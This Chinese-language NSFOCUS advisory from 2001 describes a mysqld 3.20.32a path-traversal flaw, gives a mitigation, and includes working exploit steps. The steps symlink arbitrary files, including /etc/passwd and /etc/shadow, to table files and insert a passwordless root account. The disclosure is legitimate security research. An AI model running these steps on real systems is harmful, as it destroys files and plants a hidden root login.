首页 -> 安全研究

安全研究

安全漏洞
mysqld库文件创建漏洞

发布日期:2001-03-23
更新日期:2001-03-23

受影响系统:

   mysql-3.20.32a,其它版本可能也存在此问题
描述:

任何可以用合法的用户名和密码登录进mysql的用户都可以利用mysqld来发起拒绝服
务攻击或者获得root权限,因为mysql视“../blah-blah”为合法的数据库名。其每
张表格是用3个文件表示的:tablename.ISD,tablename.ISM和tablename.frm,
但是mysqld在检查表格存在与否的时候仅仅检查tablename.frm。

<* 来源:Pavlov, Lesha (lesha@nn.ru) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


1、通过mysqld覆盖任意文件从而导致拒绝服务:
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
上述例子将覆盖/some/file/you/wish/to/overwrite。

2、通过mysqld获得root权限:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$


建议:

临时解决办法:

   NSFOCUS建议您将mysql数据库文件的属主改为普通用户,并以该普通用户的身份运行mysqld。

厂商补丁:

    暂无。


浏览次数:4673
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障